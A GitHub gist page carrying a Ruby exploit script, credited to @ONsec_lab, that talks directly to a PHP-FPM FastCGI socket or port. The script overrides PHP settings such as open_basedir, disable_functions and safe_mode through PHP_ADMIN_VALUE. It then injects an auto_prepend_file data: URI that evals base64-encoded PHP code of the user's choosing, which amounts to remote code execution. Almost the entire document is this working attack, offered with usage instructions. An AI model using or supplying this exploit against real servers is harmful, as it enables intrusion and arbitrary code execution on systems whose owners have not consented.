-
-
Save xl7dev/72f93dba273f4c353a69f770e8f9c4a6 to your computer and use it in GitHub Desktop.
PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # coding: ASCII-8BIT | |
| # Exploit Title: PHP-FPM universal SSRF bypass safe_mode/disabled_functions/open_basedir/etc | |
| # redefine any php.ini values, not specified in php_admin_value | |
| # SSRF - Server Side Request Forgery | |
| # additional info about techinuque: http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities | |
| # Google Dork: not relevant | |
| # Date: 21/11/12 | |
| # Exploit Author: @ONsec_lab http://lab.onsec.ru | |
| # Vendor Homepage: php.net fastcgi.com | |
| # Software Link: php-fpm.org | |
| # Version: all | |
| # Tested on: all | |
| # CVE : not a vuln (bug by design) | |
| require 'socket' | |
| require 'base64' | |
| class FCGIRecord | |
| class BeginRequest < FCGIRecord | |
| def initialize( id) | |
| @id = id | |
| @type = 1 | |
| @data = "\x00\x01\x00\x00\x00\x00\x00\x00" | |
| end | |
| end | |
| class Params < FCGIRecord | |
| def initialize( id, params = {}) | |
| @id = id | |
| @type = 4 | |
| @data = "" | |
| params.each do |k,v| | |
| @data << [ k.to_s.length, (1<<31) | v.to_s.length ].pack( "CN") | |
| @data << k.to_s | |
| @data << v.to_s | |
| end | |
| end | |
| end | |
| def initialize( id, type) | |
| @id = id | |
| @type = type | |
| @data = "" | |
| end | |
| def to_s | |
| packet = "\x01%c%c%c%c%c%c\x00" % [ | |
| type, | |
| id / 256, id % 256, | |
| data.length / 256, data.length % 256, | |
| data.length % 8 | |
| ] | |
| packet << data | |
| packet << "\x00" * (data.length % 8) | |
| end | |
| private | |
| attr_reader :id, :type, :data | |
| end | |
| if ARGV.count < 3 or ARGV.count > 4 | |
| STDERR.write "Usage: #{$0} ( -u /path/to/socket | addr port ) [ /path/to/any/exists/file.php ] 'some php code to execute'\n" | |
| exit 1 | |
| end | |
| script = ARGV.count == 4 ? ARGV[2] : "/usr/share/php/PEAR.php" | |
| command = Base64.encode64(ARGV.last.strip).strip.gsub( '=', '%3d').gsub( '/', '%2f') | |
| packet = "" | |
| packet << FCGIRecord::BeginRequest.new( 1).to_s | |
| packet << FCGIRecord::Params.new( 1, | |
| "SERVER_NAME" => "localhost", | |
| "REQUEST_METHOD" => "GET", | |
| "SCRIPT_FILENAME" => script, | |
| "PHP_ADMIN_VALUE" => [ | |
| "allow_url_fopen=On", | |
| "allow_url_include=On", | |
| "disable_functions=Off", | |
| "open_basedir=Off", | |
| "display_errors=On", | |
| "safe_mode=Off", | |
| "short_open_tag=On", | |
| "auto_prepend_file=data:,%3c%3f%20eval%28base64_decode%28%22#{command}%22%29%29%3f%3e" | |
| ].join( "\n") | |
| ).to_s | |
| packet << FCGIRecord::Params.new( 1).to_s | |
| packet << FCGIRecord.new( 1, 5).to_s | |
| #print packet.split('').map{ |c| '\x%02x' % c[0].ord }.join | |
| fcgisock = ARGV[0] == '-u' ? UNIXSocket.new( ARGV[1]) : TCPSocket.new( ARGV[0], ARGV[1]) | |
| fcgisock.write( packet) | |
| puts fcgisock.read |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment